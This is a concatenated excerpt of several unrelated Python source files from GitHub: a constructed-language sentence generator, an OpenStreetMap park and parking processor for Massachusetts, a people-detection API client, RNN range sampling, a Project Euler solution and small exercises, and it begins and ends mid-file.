app.run(port='5002')\n","repo_name":"lawrencechangit/CIT5820Project4","sub_path":"exchange_endpoint.py","file_name":"exchange_endpoint.py","file_ext":"py","file_size_in_byte":10491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14149082880","text":"import random\n\nhead_first = False\nsubject_left = False\nverb_attraction = False\nserial_verb = False\n\nenglish_mode = False\n\nps_rules = {}\nlexicon = {}\nenglexicon = {}\n\nenglish_ps_rules = {\n 'S': [['NP','VP']],\n 'VP': [[\"V'\",'NP'], [\"V'\"], [\"V'\",'S'], [\"V'\", 'PP'], [\"V'\", 'NP', 'PP'], [\"V'\", 'PP', 'S'], [\"V'\", 'NP', 'PP', 'S']] + [[\"V'\"]] * 4 + [[\"V'\", 'NP']] * 2,\n \"V'\": [['V'], ['V','B']] + [['V']] * 3,\n 'NP': [['D', \"N'\"]],\n \"N'\": [['N'], ['A', \"N'\"], [\"N'\", 'PP']] + [['N']] * 3,\n 'PP': [['P', 'NP']]\n}\n\n# basically, use the principles and parameters approach to generate\n# phrase-structure rules randomly so we can use those PS-rules later to generate\n# sentences\ndef init():\n global head_first\n global subject_left\n global verb_attraction\n global serial_verb\n global ps_rules\n global lexicon\n global englexicon\n head_first = random.random() < 0.5\n subject_left = random.random() < 0.90\n verb_attraction = random.random() < 0.2\n serial_verb = random.random() < 0.2\n if head_first and not subject_left and verb_attraction:\n verb_attraction = False\n elif not head_first and subject_left and verb_attraction:\n verb_attraction = False\n ps_rules['VP'] = [[\"V'\"]]\n ps_rules['NP'] = []\n ps_rules['S'] = [['NP', 'VP']] if subject_left else [['VP', 'NP']]\n ps_rules[\"N'\"] = [['N']] * 3\n ps_rules[\"V'\"] = [['V']] * 2\n ps_rules['PP'] = []\n if serial_verb:\n ps_rules['VP'] += [['VP', 'VP']]\n ps_rules['NP'] += [['D', \"N'\"]]\n ps_rules[\"N'\"] += [[\"N'\", 'A'], [\"N'\", 'PP']]\n ps_rules['PP'] += [['P', 'NP']]\n ps_rules['VP'] += [[\"V'\", 'NP'], [\"V'\"], ['V', 'S']]\n ps_rules[\"V'\"] += [[\"V'\", 'PP'], [\"V'\", 'B']]\n for rule in ps_rules['NP']:\n if not head_first: rule.reverse()\n for rule in ps_rules['VP']:\n if not head_first: rule.reverse()\n for rule in ps_rules[\"N'\"]:\n if not head_first: rule.reverse()\n for rule in ps_rules[\"V'\"]:\n if not head_first: rule.reverse()\n for rule in ps_rules['PP']:\n if not head_first: rule.reverse()\n for rule in ps_rules['NP']:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules['VP']:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules[\"N'\"]:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules[\"V'\"]:\n if random.random() < 0.05: rule.reverse()\n for rule in ps_rules['PP']:\n if random.random() < 0.05: rule.reverse()\n\n with open(\"dictionary.txt\",\"r\",encoding='utf-8') as f:\n lextemp = f.readlines()\n for i in range(len(lextemp)):\n if i % 2 == 0:\n lexicon[lextemp[i].replace('\\n','').replace(':','')] = lextemp[i+1].replace('\\n','').split(',')\n with open(\"lexicon.txt\",\"r\",encoding='utf-8') as f:\n lextemp = f.readlines()\n for i in range(len(lextemp)):\n if i % 2 == 0:\n englexicon[lextemp[i].replace('\\n','').replace(':','')] = lextemp[i+1].replace('\\n','').split(',')\n\n if english_mode:\n ps_rules = english_ps_rules\n verb_attraction = False\n lexicon = {}\n lexicon['Intrans'] = englexicon['Intrans']\n lexicon['Trans'] = englexicon['Trans']\n lexicon['Subjunct'] = englexicon['Subjunct']\n with open('nouns.txt') as f:\n lexicon['N'] = []\n for noun in f:\n lexicon['N'].append(noun.replace('\\n','').replace(' 
','').replace('[','').replace(']',''))\n with open('adjcs.txt') as f:\n lexicon['A'] = []\n for adjc in f:\n lexicon['A'].append(adjc.replace('\\n','').replace(' ','').replace('[','').replace(']',''))\n with open('preps.txt') as f:\n lexicon['P'] = []\n for prep in f:\n lexicon['P'].append(prep.replace('\\n','').replace(' ','').replace('[','').replace(']',''))\n lexicon['D'] = ['the', 'a', 'that', 'this']\n englexicon = lexicon\n\n\n\n# does some magic to recursively-ish generate a random tree using the PS-rules\n# and moves the verb around if we're dealing with verb attraction. The\n# tree starts off just \"[S[]]\", then we loop through the tree until there are no\n# \"[]\" left, replacing \"[]\" with a possible expansion of it based on the phrase\n# structure rules. For example, with English syntax, we might have \"[S[]] -\n# [S[NP[]VP[]]] - [S[NP[D N'[]]VP[V'[]]]] - S[NP[D N'[N ]]VP[V'[V ]]]]\" for a\n# simple sentence. Also, handling verb attraction, the Welsh/mirror-Welsh\n# scenario, is very tricky, involving looping through the tree, replacing S's\n# with S'[S[...] V] or S'[V S[...]] based on the head direction and keeping\n# track of where we are in the tree and all of the children of the S node.\ndef build_sentence():\n nouns = lexicon['N']\n adjcs = lexicon['A']\n preps = lexicon['P']\n detrs = lexicon['D']\n sentence = ''\n verbs = []\n engverbs = []\n tree = '[S[]]'\n done = False\n breakout = True\n start_index = 0\n while not done:\n breakout = False\n for i in range(start_index, len(tree)):\n if tree[i] == '[' and tree[i+1] == ']':\n newtree = tree[:i+1]\n token = ''\n j = i-1\n while not tree[j] == '[' and not tree[j] == ' ' and not tree[j] == ']':\n token += tree[j]\n j -= 1\n token = token[::-1]\n if token in ps_rules:\n rule = random.choice(ps_rules[token])\n if token == 'VP':\n if 'NP' in rule:\n verbs.append(random.choice(lexicon['Trans']))\n engverbs.append(random.choice(englexicon['Trans']))\n elif 'S' in rule:\n verbs.append(random.choice(lexicon['Subjunct']))\n engverbs.append(random.choice(englexicon['Subjunct']))\n else:\n verbs.append(random.choice(lexicon['Intrans']))\n engverbs.append(random.choice(englexicon['Intrans']))\n for item in rule:\n newtree += item\n if item in ps_rules:\n newtree += '[]'\n else:\n newtree += ' '\n newtree += tree[i+1:]\n tree = newtree\n breakout = True\n break\n start_index = i\n if not breakout:\n done = True\n if verb_attraction:\n done = False\n tree = tree.replace('V ', 'V* ')\n start_index = 0\n while not done:\n broken = False\n for i in range(start_index, len(tree)):\n if tree[i] == 'S' and not tree[i+1] == \"'\":\n closing_index = i\n braces = 1\n length = 0\n verb_count = 0\n in_clause = True\n while True:\n if tree[closing_index] == 'V' and not tree[closing_index + 1] == \"'\" and not tree[closing_index + 1] == 'P' and in_clause:\n verb_count += 1\n elif tree[closing_index] == '[':\n braces += 1\n elif tree[closing_index] == ']':\n braces -= 1\n elif tree[closing_index] == 'S' and closing_index > i + 3:\n in_clause = False\n closing_index += 1\n if braces == 0:\n break\n if head_first:\n length = len(\"[S'\" + 'V ' * verb_count)\n tree = tree[:i] + \"[S'\" + 'V ' * verb_count + tree[i:closing_index] + ']' + tree[closing_index:]\n else:\n length = len(\"[S'\")\n tree = tree[:i] + \"[S'\" + tree[i:closing_index+1] + 'V ' * verb_count + ']' + tree[closing_index+1:]\n broken = True\n start_index = i + length + 1\n break\n if not broken: done = True\n outer_s = True\n vindex = 0\n engsentence = ''\n for i in 
range(len(tree)):\n char = tree[i]\n if char == 'N' and tree[i+1] == ' ':\n j = random.randrange(len(nouns))\n sentence += nouns[j] + ' '\n engsentence += englexicon['N'][j] + ' '\n elif char == 'V' and tree[i+1] == ' ':\n sentence += verbs[vindex] + ' '\n engsentence += engverbs[vindex] + 's '\n vindex += 1\n elif char == 'P' and tree[i+1] == ' ':\n j = random.randrange(len(preps))\n sentence += preps[j] + ' '\n engsentence += englexicon['P'][j] + ' '\n elif char == 'D' and tree[i+1] == ' ':\n j = random.randrange(len(detrs))\n sentence += detrs[j] + ' '\n engsentence += englexicon['D'][j] + ' '\n elif char == 'A' and tree[i+1] == ' ':\n j = random.randrange(len(adjcs))\n sentence += adjcs[j] + ' '\n engsentence += englexicon['A'][j] + ' '\n elif char == 'B' and tree[i+1] == ' ':\n #j = random.randrange(len(adjcs))\n #sentence += advbs[j] + ' '\n #engsentence += advbs[j] + ' '\n pass\n elif char == 'S':\n if verb_attraction:\n if tree[i+1] == \"'\" and not outer_s: engsentence += 'that '\n else: outer_s = False\n else:\n if not tree[i+1] == \"'\" and not outer_s: engsentence += 'that '\n else: outer_s = False\n sentence = (sentence.capitalize()[:-1] + '.').replace('[','').replace(']','')\n engsentence = (engsentence.capitalize()[:-1] + '.').replace('[','').replace(']','')\n if english_mode: sentence = engsentence\n return sentence,engsentence\n","repo_name":"William103/Conlang_Generator_v5","sub_path":"python/syntax.py","file_name":"syntax.py","file_ext":"py","file_size_in_byte":9970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74588858608","text":"import sys\nimport os\nimport sqlite3\nimport glob\nimport re\nimport string\nimport shapely.geometry\nimport shapely.wkt\nimport shapely.ops\nimport geojson\nimport functools\nimport pyproj\nimport osmium\nimport rtree \n\njustLettersNumbersRe = re.compile(r'[\\W]') # \\W [^a-zA-Z0-9_]., but for unicode\n\ndef normalizeName(name) :\n return justLettersNumbersRe.sub('',name).lower()\n\nprojectionToMeters = functools.partial(pyproj.transform, pyproj.Proj(init='epsg:4326'),pyproj.Proj(init='epsg:3410'))\n\nwktfab = osmium.geom.WKTFactory()\n\nclass RoadIndexHandler(osmium.SimpleHandler):\n def __init__(self):\n osmium.SimpleHandler.__init__(self)\n self.highwayList= []\n self.highwayIndex = rtree.index.Index() \n\n def way(self, o):\n if ( 'highway' in o.tags):\n val = o.tags['highway']\n osmId = o.id\n \n if ( val == 'residential' or val == 'service' or val == 'tertiary' or val == 'secondary'):\n try:\n wkt = wktfab.create_linestring(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Highway {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Point([])\n \n except Exception as ex:\n print(\"Highway {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Point([])\n \n shape = shapely.ops.transform(projectionToMeters, shape) \n if not shape.is_empty :\n self.highwayIndex.insert(len(self.highwayList), shape.bounds)\n name = o.tags.get(\"name\", \"\") \n self.highwayList.append( {'osmId':osmId,'shape':shape,'highway':val, 'name' : name} )\n\n\nclass ParkingHandler(osmium.SimpleHandler):\n def __init__(self, c, highwayIndex):\n osmium.SimpleHandler.__init__(self)\n self.c = c\n self.parkingCount = 0\n\n propList = self.c.execute('SELECT osmid,geom FROM properties')\n self.propList= []\n\n self.parking = []\n self.parkingTags = []\n self.highwayIndex = highwayIndex\n\n self.propIndex = rtree.index.Index() \n\n for row in 
propList:\n (osmId,propGeom) = row\n shape = shapely.wkt.loads(propGeom) \n shape = shapely.ops.transform(projectionToMeters, shape) \n if not shape.is_empty :\n self.propIndex.insert(len(self.propList), shape.bounds)\n self.propList.append( {'osmId':osmId,'shape':shape} )\n \n def isParking(self,o):\n takeObj = False\n if 'amenity' in o.tags and o.tags['amenity'] == 'parking':\n takeObj = True\n return takeObj\n\n def node(self,o):\n if self.isParking(o):\n osmId = \"N\" + str( int(o.id))\n\n try:\n wkt = wktfab.create_point(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Parking Point {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Polygon([])\n \n except Exception as ex:\n print(\"Parking Point {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Polygon([])\n \n self.areaParking(o,shape, osmId)\n \n def area(self,o):\n if self.isParking(o):\n\n osmId = o.id\n if ( osmId % 2 ):\n osmId = 'R' + str( int((osmId-1)/2))\n else:\n osmId = 'W' + str( int(osmId/2))\n \n try:\n wkt = wktfab.create_multipolygon(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Parking Area {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Polygon([])\n \n except Exception as ex:\n print(\"Parking Area {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Polygon([])\n \n self.areaParking(o,shape, osmId)\n\n def areaParking(self,o,shape, osmId):\n\n access = o.tags.get(\"access\",\"yes\")\n name = o.tags.get(\"name\",\"\")\n\n shapeProj = shapely.ops.transform(projectionToMeters, shape) \n used = False \n if ( not shapeProj.is_empty) :\n for j in self.propIndex.intersection( shapeProj.bounds):\n prop = self.propList[j]\n dist = shapeProj.distance(prop['shape'])\n\n if ( dist < 1 or ( dist < 50 and (access == \"yes\" or access == \"public\" or access == \"permissive\"))): \n\n if ( not shape.is_empty):\n scalerank = 5\n self.parking.append( shape)\n self.parkingTags.append( {'type':'parking', 'name': name, 'scalerank' : int( scalerank ) })\n\n if ( len(name ) == 0):\n name = self.generateName(shapeProj)\n \n used = True\n wkt = shapely.wkt.dumps(shape)\n self.c.execute('insert into parking (osmId,propertyOsmID,name,geom) VALUES (?,?,?,?);',(osmId,prop['osmId'],name,wkt ))\n\n if ( used ):\n self.parkingCount += 1\n\n def generateName( self, shapeProj):\n\n nearby = list(self.highwayIndex.highwayIndex.nearest(shapeProj.bounds, 100))\n\n def sortHighways(j):\n highway = self.highwayIndex.highwayList[j]\n dist = shapeProj.distance( highway['shape'])\n return dist\n\n nearby= sorted( nearby, key=sortHighways)\n\n for j in nearby:\n highway = self.highwayIndex.highwayList[j]\n if ( len(highway['name']) > 0 ):\n return \"Off \" + highway['name']\n\n return ''\n\n\nclass PropertiesHandler(osmium.SimpleHandler):\n def __init__(self, c):\n osmium.SimpleHandler.__init__(self)\n self.c = c\n self.propertyCount = 0\n self.properties = []\n self.propertyTags = []\n \n\n townList = self.c.execute('SELECT name,geom FROM towns ORDER BY name')\n self.townList= []\n self.townIndex = rtree.index.Index() \n\n for row in townList:\n (townName,townGeom) = row\n shape = shapely.wkt.loads(townGeom) \n shape = shapely.ops.transform(projectionToMeters, shape) \n\n if ( shape.is_valid == False): \n print(\"Town {} has bad toplogy\".format(townName))\n\n self.townIndex.insert(len(self.townList), shape.bounds)\n self.townList.append( { 'townName':townName, 'shape':shape } )\n \n def isProperty(self,o):\n takeObj = 
False\n if 'landuse' in o.tags :\n v = o.tags['landuse']\n if v == 'conservation' or v == 'recreation_ground':\n takeObj = True\n if 'leisure' in o.tags :\n v = o.tags['leisure']\n if v == 'recreation_ground' or v == 'nature_reserve' or v == 'park':\n takeObj = True\n if 'boundary' in o.tags:\n v = o.tags['boundary']\n if v == 'national_park' or v == 'protected_area':\n takeObj = True\n return takeObj\n\n def area(self,o):\n if self.isProperty(o):\n self.areaProcessProperty(o)\n\n def areaProcessProperty(self,o):\n self.propertyCount += 1\n osmId = o.id\n if ( osmId % 2 ):\n osmId = 'R' + str( int((osmId-1)/2))\n else:\n osmId = 'W' + str( int(osmId/2))\n\n try:\n wkt = wktfab.create_multipolygon(o)\n shape = shapely.wkt.loads(wkt) \n\n if ( shape.is_valid == False):\n print(\"Area {} Has bad toplogy\".format(osmId))\n shape = shapely.geometry.Polygon([])\n \n except Exception as ex:\n print(\"Area {} Has bad toplogy {}\".format(osmId,ex))\n shape = shapely.geometry.Polygon([])\n\n boundary = o.tags.get(\"boundary\", \"\")\n landuse = o.tags.get(\"landuse\", \"\")\n leisure = o.tags.get(\"leisure\", \"\")\n\n name = o.tags.get(\"name\", \"\")\n alt_name = o.tags.get(\"alt_name\", \"\")\n website = o.tags.get(\"website\", \"\")\n wikipedia = o.tags.get(\"wikipedia\",\"\")\n openingHours = o.tags.get(\"opening_hours\",\"\")\n startDate = o.tags.get(\"start_date\",\"\")\n\n propType = \"\"\n \n if 'landuse' in o.tags :\n v = o.tags['landuse']\n if v == 'conservation':\n propType = \"conservation\"\n if v == 'recreation_ground':\n propType = \"recreation_ground\"\n\n if 'leisure' in o.tags :\n v = o.tags['leisure']\n if v == 'nature_reserve':\n propType = \"conservation\"\n if v == 'recreation_ground':\n propType = \"recreation_ground\"\n if v == 'park':\n propType = \"park\"\n \n if 'boundary' in o.tags:\n v = o.tags['boundary']\n if v == 'national_park' or v == 'protected_area':\n propType = \"conservation\"\n\n access = o.tags.get(\"access\",\"\")\n # allowed access tag values. 
Kill everything else.\n if ( access != \"no\" and access != \"yes\" and access != \"public\" and access != \"private\" and access != \"permissive\"):\n access = \"\"\n accessRaw = o.tags.get(\"access\",\"\")\n\n owner = o.tags.get(\"owner\", \"\")\n # fixup some known/simple errors in OSM owner names, that are really \n # not worth the trouble fixing in OSM.\n if ( owner == 'X'):\n owner = \"\"\n owner = owner.replace(\" Of \",\" of \")\n owner = owner.replace(\" And \",\" and \")\n owner = owner.replace(\"Dcr \",\"DCR \")\n owner = owner.replace(\" Llc \",\" LLC\")\n \n self.updateTownSql(osmId, name,website, owner, startDate, propType, access, accessRaw,wikipedia, openingHours, boundary, landuse, leisure, shape)\n\n shapeProj = shapely.ops.transform(projectionToMeters, shape) \n\n largestTownName = \"\"\n largestTownArea = 0\n if ( not shapeProj.is_empty and shapeProj.area > 0) :\n for j in self.townIndex.intersection( shapeProj.bounds):\n townName = self.townList[j]['townName']\n townShape = self.townList[j]['shape']\n\n\n areaInTown = shapeProj.intersection(townShape)\n if ( areaInTown.area > largestTownArea) :\n largestTownArea = areaInTown.area\n largestTownName = townName\n\n if ( areaInTown.area > 2000 or areaInTown.area/shapeProj.area > 0.20 ):\n self.c.execute('insert into propertyInsides (osmId,townName) VALUES (?,?);',(osmId,townName))\n\n if ( not shape.is_empty ):\n self.properties.append( shape)\n\n scalerank = 5\n areaSqKm = shapeProj.area / (1000*1000)\n if ( areaSqKm > 3):\n scalerank = 1\n elif ( areaSqKm > 1.5):\n scalerank = 2\n elif ( areaSqKm > 0.75):\n scalerank = 3\n elif ( areaSqKm > 0.1):\n scalerank = 4\n \n self.propertyTags.append( \n {\n 'type':propType, \n 'town':largestTownName,\n 'url': '/towns/' + largestTownName + '/' + normalizeName(name) + \".html\",\n 'website':website,\n 'owner':owner, \n 'ownerUrl':'/landowners/' + normalizeName(owner) + \".html\",\n 'name': name, \n 'areaSqKm':areaSqKm,\n 'scalerank' : int( scalerank ) \n })\n\n\n def updateTownSql( self, wayid, name,website, owner, startDate, propType, access, accessRaw,wikipedia, openingHours, boundary, landuse, leisure, shape):\n normalizedOwnerName = normalizeName(owner)\n normalizedName = normalizeName(name)\n\n existingProperty = self.c.execute('SELECT * FROM properties where osmId == ?',(wayid,))\n if ( existingProperty.fetchone() ) :\n self.c.execute(\n \"update properties set name=?,normalizedName=?,ownerName=?,normalizedOwnerName=?, \" + \n \"website=?,startDate=?,type=?,access=?,accessRaw=?,wikipedia=?, opening_hours=?, boundary=?, landuse=?, leisure=?, geom=? 
\" + \n \"where osmId = ?;\",\n (name,normalizedName,owner,normalizedOwnerName,website,startDate, propType, access, accessRaw,wikipedia, openingHours, boundary, landuse, leisure, shape.wkt,wayid))\n else:\n self.c.execute(\n \"insert into properties (osmId,name,normalizedName,ownerName,normalizedOwnerName, \" + \n \"website,startDate, type,access, accessRaw,wikipedia, opening_hours, boundary, landuse, leisure, updateId,publicTrailLength, geom) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);\",\n (wayid,name,normalizedName,owner,normalizedOwnerName,website,startDate, propType, access,accessRaw,wikipedia, openingHours, boundary, landuse, leisure, 0,0,shape.wkt))\n\n if ( len(owner) > 0 ) :\n\n # remove everything that is not a letter or number, lower case\n normalizedName = normalizeName(owner)\n\n existingOwner = self.c.execute('SELECT * FROM landowners where normalizedName == ?',(normalizedName,))\n if ( existingOwner.fetchone() == None) :\n self.c.execute('insert into landowners (name,normalizedName,updateId) VALUES (?,?,?);',(owner,normalizedName,0))\n\n\ndef updateProperties():\n conn = sqlite3.connect('mass-trails.sqlite')\n conn.execute(\"Delete from propertyInsides\")\n conn.execute(\"Delete from properties\")\n\n ph = PropertiesHandler(conn)\n\n ph.apply_file(\"massachusetts-latest.osm.pbf\", locations=True, idx='sparse_mem_array')\n\n print(\"Number of Properties: %d\" % ph.propertyCount)\n\n ownerPropertyCountList = conn.execute(\n \"select properties.normalizedOwnerName , count(osmId) \"\n \"from landowners, properties \"\n \"where landowners.normalizedName = properties.normalizedOwnerName \"\n \"group by properties.normalizedOwnerName order by count(osmId)\").fetchall()\n\n for row in ownerPropertyCountList:\n normalizedName,count = row\n\n if ( count == 0) :\n print(\"deleting {}\".format(normalizedName))\n conn.execute(\"delete landowners where landowner.normalizedName = ?\",(normalizedName,))\n\n count = conn.execute(\"select count(*) from landowners\").fetchone()\n\n print(\"Number of landowners: {}\".format(count[0]))\n\n conn.commit()\n conn.close()\n\n return ph\n\ndef updateParking():\n highwayIndex = RoadIndexHandler()\n highwayIndex.apply_file(\"massachusetts-latest.osm.pbf\", locations=True, idx='sparse_mem_array')\n\n conn = sqlite3.connect('mass-trails.sqlite')\n conn.execute(\"Delete from parking\")\n\n ph = ParkingHandler(conn, highwayIndex)\n ph.apply_file(\"massachusetts-latest.osm.pbf\", locations=True, idx='sparse_mem_array')\n\n print(\"Number of Parking Lots: %d\" % ph.parkingCount)\n\n conn.commit()\n conn.close()\n\n return ph\n\n\npropertyHandler = updateProperties()\nparkingHandler = updateParking()\n\nwith open(\"properties-osm.geojson\",\"wt\") as outputFile:\n features =[]\n\n for index, p in enumerate( propertyHandler.properties):\n\n #print(p)\n features.append( geojson.Feature(geometry=p, properties=propertyHandler.propertyTags[index]))\n\n for index, p in enumerate( parkingHandler.parking):\n #print(p)\n features.append( geojson.Feature(geometry=p, properties=parkingHandler.parkingTags[index]))\n\n featureC = geojson.FeatureCollection(features)\n maTrails = geojson.dumps(featureC)\n\n outputFile.write(maTrails)\n\n\n#updateTownBounds()\n\n \n\n","repo_name":"jremillard/mass-trails.org","sub_path":"src/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":16233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"5003819939","text":"\n\"\"\" Program to calculate and 
display a user's bonus based on sales.\nIf sales are under $1,000, the user gets a 10% bonus.\nIf sales are $1,000 or over, the bonus is 15%.\"\"\"\n\nMENU = \"What is the sales amount ? to display your Bonus\"\nprint (MENU)\nsales = float(input(\"Enter Sales: $\"))\nif sales >= 0 and sales < 1000:\n bonus = sales * 0.1\n print(\"Bonus: $\",(bonus))\nelif sales >= 1000:\n bonus = sales * 0.15\n print(\"Bonus: $\",(bonus))\nelse:\n print(\"Enter valid sales amount:\")\n\n\n","repo_name":"sharathbc88/Python-Workshop","sub_path":"practical 1/SalesBonus.py","file_name":"SalesBonus.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6152944900","text":"from typing import List\n\nimport requests\nfrom flask import Response\n\nfrom ..primitives import BoundingBox\nfrom .errors import RequestProcessingError\nfrom ..config import DETECT_PEOPLE_PATH\n\nfrom .primitives import ServiceSpecs\n\n\nimport numpy as np\n\n\nclass PeopleDetectionServiceClient:\n\n def __init__(self,\n people_detection_service_specs: ServiceSpecs,\n service_token: str):\n self.__people_detection_service_specs = people_detection_service_specs\n self.__service_token = service_token\n\n def detect_people(self, image: np.ndarray) -> List[BoundingBox]:\n from ..utils import compose_url, image_to_jpeg_bytes\n headers = {\n 'Authorization': f'Bearer {self.__service_token}'\n }\n raw_image = image_to_jpeg_bytes(image=image)\n files = {'image': raw_image}\n url = compose_url(\n service_specs=self.__people_detection_service_specs,\n path_postfix=DETECT_PEOPLE_PATH\n )\n response = requests.post(\n url, headers=headers, files=files, verify=False\n )\n if response.status_code == 200:\n return self.__convert_valid_output(response=response)\n else:\n raise RequestProcessingError(\n f'Error code: {response.status_code}, Cause: {response.text}'\n )\n\n def __convert_valid_output(self, response: Response) -> List[BoundingBox]:\n raw_bboxes = response.json()['people']\n return [BoundingBox.from_dict(raw_bbox) for raw_bbox in raw_bboxes]\n","repo_name":"PawelPeczek/ModelAsAService","sub_path":"pipeline_sdk/pipeline_sdk/proxies/people_detection.py","file_name":"people_detection.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31976681453","text":"import dataload\nimport smtbmc\nimport random\n\n# -----------------------------------------------\n# configurations\n\nclipping3_modelpath = \"/home/hongce/deep_monkey/results/2019-06-24_0_neurons_10_steps_110.0_noise_0.3\"\nclipping4_modelpath = \"/home/hongce/deep_monkey/results/2019-06-25_0_neurons_10_steps_110.0_noise_0.3\"\nrelu_stable_modelpath = \"/home/hongce/deep_monkey/results/2019-06-17_0_neurons_10_steps_110.0_noise_0.3\"\noriginalPath = \"/home/hongce/deep_monkey/results/2019-06-04_0_neurons_10_steps_110.0_noise_0.3\"\n\n# -----------------------------------------------\n# main function\n\ndef gen_stimulus(idx): # [0,1] -> [-2,2]\n n = random.random()*4-2\n assert (-2 <= n <= 2)\n return n\n\ndef main():\n N = 5000\n random.seed(2000)\n weightsObj = dataload.LOADER(clipping4_modelpath, 10, clipping = 4.0)\n #weightsObj = dataload.LOADER(relu_stable_modelpath, 10)\n #weightsObj = dataload.LOADER(originalPath, 10)\n rsObj = smtbmc.RangeSampling(weightsObj)\n for i in range(N):\n if i % (N/100) == 0 and i > 0: \n print (i/N*100, '%', end = '')\n lbs, ubs = 
rsObj.get_node_output_range()\n print (min(lbs), max(ubs))\n rsObj.sample_a_point(50, gen_stimulus, 30, clipping=4.0)\n rsObj.update_range()\n\n rsObj.print_signs() \n lbs, ubs = rsObj.get_node_output_range()\n print ('lbs:', lbs)\n print ('ubs:', ubs)\n print (min(lbs))\n print (max(ubs)) \n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"nnarodytska/VERRNN","sub_path":"verrnn/clipping_samping.py","file_name":"clipping_samping.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"42804332267","text":"from time import time\nfrom math import sqrt\n\ndef unique(lst):\n if len(set(lst)) == len(lst):\n return lst\n else:\n return None\n\ndef check(l, mod):\n n = l[0] * 100 + l[1] * 10 + l[2]\n return n % mod\n\ndef number(arr):\n p = 0\n n = 0\n for i in reversed(range(len(arr))):\n n += arr[i] * 10**p\n p += 1\n return n\n\ndef is_prime(n):\n if n < 2: return False\n for i in range(2, int(sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True\n\ndef next_prime(n):\n while not is_prime(n+1):\n n += 1\n return n + 1\n\ndef make(num, stop):\n if num == stop:\n #ONE LINER\n # [[n//100, n//10 % 10, n%10] for n in range(1, 1000) if n%17 == 0 and len(Counter(str(n))) == len(str(n))]\n #FAST\n n = stop\n while n < 1000:\n l = [n // 100, n // 10 % 10, n % 10]\n if unique(l): yield l\n n += stop\n else:\n for n in make(next_prime(num), stop):\n for i in range(10):\n dig = unique([i] + n)\n if dig and check(dig, num) == 0:\n yield dig\n\n#RUN\nresult = 0\nfor arr in make(1, 17):\n result += number(arr)\nprint(result)\n\n#BENCHMARK\n# def bm():\n# t0 = time()\n# for _ in range(1000):\n# result = 0\n# for arr in make(1, 17):\n# result += number(arr)\n# t1 = time()\n# print(t1-t0)\n","repo_name":"travisoneill/project-euler","sub_path":"python/043.py","file_name":"043.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37907555619","text":"import http.client\n\n# Buat koneksi ke server\nconn = http.client.HTTPConnection(\"filkom.ub.ac.id\")\n\n# Kirim request\nconn.request(\"GET\", \"/\")\n# Baca response\nresp = conn.getresponse()\n\n# Baca header \nheader = resp.getheaders()\n# Baca body\nbody = resp.read()\n\n# Cetak header dan body\n#print(header)\nprint(body)","repo_name":"zeddinarief/progjar2018","sub_path":"kelasd/cobahttp.py","file_name":"cobahttp.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"46923157872","text":"from datetime import datetime as dt\nimport os\n\nimport pandas as pd\nimport simplejson as sjson\n\nimport utils as u\n\ncfg = u.get_config()\ndata_cfg = u.get_config(\"data\")\n\ndef get_feature_set_data(which_data=\"clean\", just_key_comps=True, season=None):\n feature_set_fp = os.path.join(cfg['DIRS']['CSV_OF_JSON_DATA'], f\"{which_data}/match_stats.csv\")\n data = pd.read_csv(feature_set_fp)\n\n if season is not None:\n data = data[data.league_season == int(season)].copy()\n\n if just_key_comps:\n data = data[(data[\"league_type\"] == \"League\") | (data[\"country\"] == \"World\")].copy()\n data = data[data.fixture_round != \"Finals\"].copy() # One match in Bundesliga\n \n data.sort_values(by=\"fixture_id\", inplace=True, ignore_index=True)\n \n return data\n\n\ndef get_number_of_matches(which_data=\"clean\", just_key_comps=True, season=None):\n data = 
get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n return len(data)\n\n\ndef get_number_of_match_stats(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n match_stat_cols = data.columns.tolist()\n for col in data_cfg[\"MATCH_INFO\"][\"COLUMNS\"]:\n match_stat_cols.remove(col)\n \n return len(match_stat_cols)/2\n\n\ndef get_all_team_names(which_data=\"clean\", just_key_comps=True, season=None):\n data = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n \n home_teams = data[\"home_team_name\"].unique().tolist()\n away_teams = data[\"away_team_name\"].unique().tolist()\n\n if sorted(home_teams) == sorted(away_teams):\n return home_teams\n else:\n return {\"home_teams\": home_teams, \"away_teams\": away_teams}\n\n\ndef get_number_of_teams(which_data=\"clean\", just_key_comps=True, season=None):\n teams = get_all_team_names(which_data=which_data, just_key_comps=just_key_comps, season=season)\n\n if isinstance(teams, list):\n return 